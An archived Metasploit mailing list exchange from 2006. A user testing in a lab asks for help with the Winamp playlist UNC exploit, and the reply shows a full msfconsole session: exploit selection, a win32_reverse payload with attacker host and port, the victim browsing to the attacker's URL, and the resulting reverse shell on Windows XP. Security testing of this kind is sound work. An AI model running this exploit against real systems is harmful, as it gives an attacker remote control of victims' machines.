Metasploit mailing list archives

winamp exploit question


From: hdm at metasploit.com (H D Moore)
Date: Sat, 4 Feb 2006 20:50:41 -0600

On the attacking machine:

+ -- --=[ msfconsole v2.5 [161 exploits - 78 payloads]

msf > use winamp_playlist_unc
msf winamp_playlist_unc > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf winamp_playlist_unc(win32_reverse) > set LHOST 192.168.0.100
LHOST -> 192.168.0.100
msf winamp_playlist_unc(win32_reverse) > set LPORT 4321
LPORT -> 4321
msf winamp_playlist_unc(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.0.100:8080/


On the victim machine, just put http://192.168.0.100:8080/ into the 
browser's location bar...


[*] HTTP Client connected from 192.168.0.219:1812, redirecting...
[*] HTTP Client connected from 192.168.0.219:1813, sending 312 bytes of 
payload...
[*] Got connection from 192.168.0.100:4321 <-> 192.168.0.219:1815

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Winamp>

-HD

On Saturday 04 February 2006 20:15, captgoodnight wrote:
Please forgive my ignorance. I'm trying to test this particular
exploit, but for some reason I can't get it to run on any winamp v5.12s
I've tried. So I'm thinking it's my use error. Can someone run this
exploit on a test victim and copy the method/output here. So I can slap
myself with a noob fish;)

Thanks list,
cg



Current thread: